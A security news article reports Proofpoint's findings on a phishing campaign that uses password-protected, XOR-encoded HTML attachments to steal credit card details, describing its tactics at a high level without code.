A recently detected phishing campaign designed to steal credit card information employed a series of attack tactics previously associated with malware distribution, Proofpoint security researchers reveal.
The technique involves the distribution of a malicious document inside a .zip archive that is password-protected. The archive is attached to an email and the password to open it is included in the email body. Most recently, the method was used to distribute the Cerber ransomware (the campaign also dropped the Ursnif banking Trojan).
Recently, phishers decided to adopt the technique and adapt it to their needs in an attempt to steal banking data. However, instead of an Office document, this attack uses an HTML attachment that has been password-protected.
As expected, the email message is personalized with the recipient’s name, as well as with what supposedly represents the first digits of their credit card account number. However, since these digits are standardized, this apparent personalization is only meant to create a sense of legitimacy for the carefully crafted emails without requiring actual knowledge of a potential victim’s actual card number.
Furthermore, the spam emails use stolen branding and social engineering tactics to create a sense of urgency and trick the user into giving away their credit card information: recipients are told they need to update their security information for their “new chip card.”
The HTML attachment used in this campaign was found to be XOR-encoded to make dynamic analysis more difficult. According to Proofpoint, the password protection is implemented with the help of JavaScript. A script named pah.js is used to decrypt the XOR-encoded HTML when the user enters the password.
As soon as the user enters the password provided in the email body and the HTML attachment is decrypted, a fairly typical credit card phishing template complete with stolen branding is displayed. The same as in credential phishing attacks performed via HTTP POST, users are required to enter their credentials in the form.
The use of a password-protected attachment is meant not only to make detection and analysis more difficult, but also to convince users that the email is legitimate. The fact that the password is included in the email body also adds to this sense of legitimacy, in addition to making it easy for the recipients to open the attachment.
“Credential and credit card phishing are nearly as old as cybercrime itself. This hasn’t stopped phishing actors from innovating, exploring new approaches to convincing users to divulge personal, banking, and financial information. In this case, we observed threat actors taking a cue from malware distributors, using password protected document attachments to bypass anti-malware technologies and give recipients a false sense of security,” Proofpoint researchers note.
Related: Backdoored Phishing Templates Advertised on YouTube
